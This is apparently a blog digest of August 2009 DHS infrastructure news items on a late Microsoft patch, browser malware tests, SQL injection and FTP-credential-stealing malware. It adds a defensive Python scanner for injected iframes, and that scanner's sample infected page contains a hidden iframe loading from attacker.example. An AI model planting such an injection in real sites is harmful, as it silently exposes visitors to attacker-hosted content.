The DHS Daily Open Source Infrastructure Report covers the publicly reported material for the preceding day(s) not previously covered. This weekly summary provides a selection of those items of greatest significance to the InfoSec professional.
Week Ending: Friday, August 21, 2009
Infrastructure Report for 17 August 2009
A bug fix takes two years to release! Should this be where you place your trust?
48. August 14, The Register – (International) MS Zero-day security bug was two years in the making. A flaw in Office Web Components which Microsoft fixed on August 11 was first reported to the software giant over two years ago, it has emerged. The time taken to release a patch has security vendors speculating that Microsoft only got around to fixing the software flaw at all because hackers began exploiting it in recent weeks. The arrival of the MS09-043 patch addressed a zero-day flaw that had become the fodder of drive-by download attacks from malicious web pages. The patch addressed four vulnerabilities in the Office Web Components ActiveX control in total, including the zero-day flaw. Users previously had to rely on workarounds published by Microsoft in a July advisory. The zero-day bug was discovered by a researcher and first reported to Microsoft in March 2007 via the TippingPoint Zero Day Initiative scheme, which pays researchers for security exploits. TippingPoint uses this information to add signature detection against exploits based on the bug to its intrusion prevention products. It also passes the information along to the relevant software developers, in this case Microsoft. Responding to a question on the long delay, a ZDI manager told heise Security, “they [Microsoft] kept finding the need for more time to ensure the issue was completely addressed.” Source: http://www.theregister.co.uk/2009/08/14/ms_zero_day_long_gestation/
Infrastructure Report for 18 August 2009
Has Microsoft restored your faith? Mine remains with Firefox.
42. August 14, SCMagazine – (International) Microsoft leads browsers in malware, phishing defense. It appears that the comprehensive security features built into Internet Explorer 8 (IE 8) are paying off for Microsoft. The browser, released in March with a number of enhanced phishing and anti-malware components, blocked an average of 81 percent of socially engineered malware and stopped 83 percent of suspected phishing sites, topping four other major browsers, according to new tests conducted by NSS Labs. NSS based its findings on two weeks of analyzing 593 phishing sites and 608 unique URLs that contained malicious software, the company’s president told SCMagazineUS.com on August 13. “Everyone thinks Microsoft stinks at security,” he said. “They need to get some credit for some of the good stuff they’ve done. Microsoft has been a big target for attacks for a long time, and that’s actually a benefit to them. They’ve learned how they can turn that around and protect themselves better.” In catching and stopping socially engineered malware, a significant drop-off occurred after the Microsoft browser. Firefox 3 was next in line, blocking 27 percent. Apple’s Safari 4 thwarted 21 percent, followed by Google Chrome (seven percent) and Opera 10 (one percent). The browsers, as a group, performed relatively better in offering phishing protection. Firefox deterred 80 percent of suspected fraud sites, Opera caught 54 percent, followed by Chrome (26 percent) and Safari (two percent). Source: http://www.scmagazineus.com/Microsoft-leads-browsers-in-malware-phishing-defense/article/146505/
Infrastructure Report for 19 August 2009
Is Charter a participant in your extended network? Could you be impacted next?
40. August 17, Redding Record-Searchlight – (California) Charter Internet suffers rolling outages. Local Charter Media Internet subscribers on August 17 have been subjected to disconnections and slow speeds due to an outage that has been “rolling from area to area.” A Charter spokeswoman in Redding said company troubleshooters were notified of the problem around 10:30 a.m. She said the problem has spread through Northern and Southern California and a few other states. She did not know how many customers were affected. “We don’t know the cause, other than it’s with our third-party vendor,” she said. “Call centers have all been alerted to this, and hopefully information is getting back to customers on a timely basis.” Source: http://www.redding.com/news/2009/aug/17/charter-internet-suffers-rolling-outages/
Infrastructure Report for 20 August 2009
SQL issues again. Will it ever end?
35. August 18, SearchSecurity.com – (International) SQL Injection continues to trouble firms, lead to breaches. SQL injection, one of the most basic and common attacks against websites and their underlying databases, offers an easy entry point for cybercriminals, according to security experts. The hackers responsible for the largest data security breach in U.S. history allegedly used a SQL injection attack. The coding error was cited as the starting point in the indictment handed down against a Miami man and two Russian hackers, who allegedly used it to bilk Heartland Payment Systems Inc. and Hannaford Brothers Co. of more than 130 million credit and debit card numbers. But security experts say that while SQL injection errors are relatively easy to find, as simple as finding a poorly coded input field in a Web form, they are often difficult and costly to fix. A vulnerability scan is likely to turn up thousands of errors that lend themselves to SQL injection, said the chief technology officer of Cigital Inc., a software security and quality consulting firm. New defenses for automated SQL injection attacks: by automating SQL injection attacks, hackers have found a way to expedite the process of finding and exploiting vulnerable websites. “Sometimes there’s one problem that results in a thousand possible cross-site scripting issues and if you fix that problem they’ll all be fixed, but that’s not always the case,” the chief technology officer said. “There have been a lot of bugs that built up behind the dam and now we’re seeing the dam starting to rumble.” Source: http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1365263,00.html
Infrastructure Report for 21 August 2009
Hmmmm. Is it possible that your web development activity is so infected?
41. August 19, Internet Evolution – (International) Nasty malware attack targets web developers. There is a nasty bug going around the Web that targets developers. When a developer visits an infected site, the page installs a virus on their machine that silently copies the passwords stored in FileZilla, CuteFTP, and possibly other File Transfer Protocol (FTP) client software, and sends them to a central server. The server then runs a bot to access all sites for which credentials have been stolen and installs an iframe injection attack on many pages, further spreading the infection. Infected sites occasionally break if they use the Web scripting language PHP, but frequently they continue to operate, and thus infect more users with the virus. When a search engine such as Google detects the infection in a site, they may remove the site from their index, resulting in a financial loss to the site owner. Some browsers may flag the site as infected and show a warning that scares away users. This attack is interesting because of the way it spreads, and the risk to developers. No one would want to be the freelance Web professional who has to explain to a few dozen clients why their sites all got hacked. Presumably, this attack vector will eventually be used to install a payload, such as software for sending spam or executing denial-of-service attacks. After all, today’s best malware is all about making money. Source: http://www.internetevolution.com/author.asp?section_id=732&doc_id=180663
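The injected iframes the article describes are usually sized or styled so visitors never see them and point at a host the site does not own. As an added example (not code from the Internet Evolution article or the DHS report), here is a small scanner a Web professional could run over a client's pages to find such injections. The hiding heuristics, the sample pages and the host names are my own assumptions for the demonstration.

```python
"""Added example: flag iframes that are hidden or load from an off-site host,
the usual signature of the iframe injections described above.
Sample pages and host names are constructed for the demonstration."""
from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_hidden(attrs):
    """True if the iframe is sized or styled so a visitor would not see it.
    Heuristics (assumed): display:none, visibility:hidden, or width/height <= 1."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        val = attrs.get(dim, "").strip().lower().rstrip("px")
        if val.isdigit() and int(val) <= 1:
            return True
    return False


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def find_suspect_iframes(html, site_host):
    """Return (src, reason) for each iframe that is hidden or whose src host
    differs from the site's own host. A clean page yields an empty list."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if _is_hidden(attrs):
            reasons.append("hidden")
        if host and host != site_host.lower():
            reasons.append("offsite:" + host)
        if reasons:
            findings.append((src, ",".join(reasons)))
    return findings


# Constructed sample pages for the site www.example.com.
CLEAN_PAGE = (
    '<html><body><h1>Welcome</h1>'
    '<iframe src="http://www.example.com/map" width="400" height="300"></iframe>'
    '</body></html>'
)
# The injected page: a zero-size, display:none frame pulling from attacker.example.
INFECTED_PAGE = (
    '<html><body><h1>Welcome</h1>'
    '<iframe src="http://attacker.example/in.php" width="0" height="0" '
    'style="display: none"></iframe>'
    '</body></html>'
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, find_suspect_iframes(page, "www.example.com"))
```

Run over every HTML, PHP and template file in a site's document root, this catches the frames that a search engine or browser warning would otherwise be the first to tell you about. It will not catch the credential theft itself, so the accompanying fix is to change every FTP password the infected workstation had stored and to stop saving them in the client.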
Note: The DHS only maintains the last ten days of their reports online. To obtain copies of earlier reports or complete summaries, go to: